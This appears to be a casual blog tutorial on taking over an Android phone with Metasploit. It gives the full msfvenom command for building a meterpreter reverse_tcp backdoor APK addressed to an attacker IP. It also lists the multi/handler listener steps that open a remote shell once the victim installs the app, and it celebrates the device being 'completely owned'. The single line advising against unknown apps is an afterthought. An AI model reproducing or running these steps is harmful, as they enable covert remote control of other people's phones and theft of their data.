How to h#ck Android
😈
How to h#ck Android
Requirements:-
1. Metasploit Framework (Use Android oR U can use Kali Linux)
#How to install Metasploit-Framework On Android Click here
2.Victims (Sama ne wala ka phone)
Android Smartphone (Unfortunately that is my phone)
Steps To Hack Android SmartPhone Using Metasploit:
So now lets get into it 💥.
Step 1 : >>>
Open Termux app (Open termial )
We are going to use Metasploit Venom Framework to create the
exploit/backdoor > VIRUS.apk
Use this command to generate the exploit/Backdoor for the victim.
1 . Enter this line on termux app :>>>
msfvenom -p android/meterpreter/reverse_tcp LHOST=<attacker_system_ip> LPORT=4444 R > hack.apk
How to find local ip
2 . Enter this line in termial
ifconfig
Generate Android Payload using msfvenom
Let me explain the above Command so we are using msfvenom as the exploit
generator for an android using Meterpreter for the reverse connection to the
attacker’s system. LHOST defines the attackers IP address where he will get
the reverse connection from the victim. And same with the LPORT connection
will be made on port 4444 and R > is used to generate the executable.
MSFVenom Payload
Now we are all ready for the next step as this payload use reverse_tcp so
the attacker will be listening to the port specified in the payload for a
reverse connection from the victim.
So now we need to set up a handler to handle incoming connections to the
port let’s do it.
Now enter this command in new line terminal
1 . msfconsole
2 . use exploit/multi/handler
3 . set payload android/meterpreter/reverse_tcp
Now we will see any open connections, on attacker’s device.
4 . set lhost 192.168.1.104 ( # enter your ip)
5 . set lport 4444
6. exploit
Remember that the LHOST & LPORT are going to be the attacker IP address
and port to listen to the reverse connection. and exploit to start
listening.
Now as soon as the attacker installs the APK exploit/backdoor you will get
the reverse meterpreter session on you terminal like this.
Here we have some information that we have extracted from the Android system
so the victim’s phone have been completely owned.
Finally, The successful hack dance 😈 😈
So after all this explain what we have learned is never install apps from
unknown sources 😀 or else you are completely screwed :3
This is working only Same wifi network ( local network)
Do you like the tutorial on Hack Android Smartphone using Metasploit? Share
this article with your friends.
👇
Comment me Any errors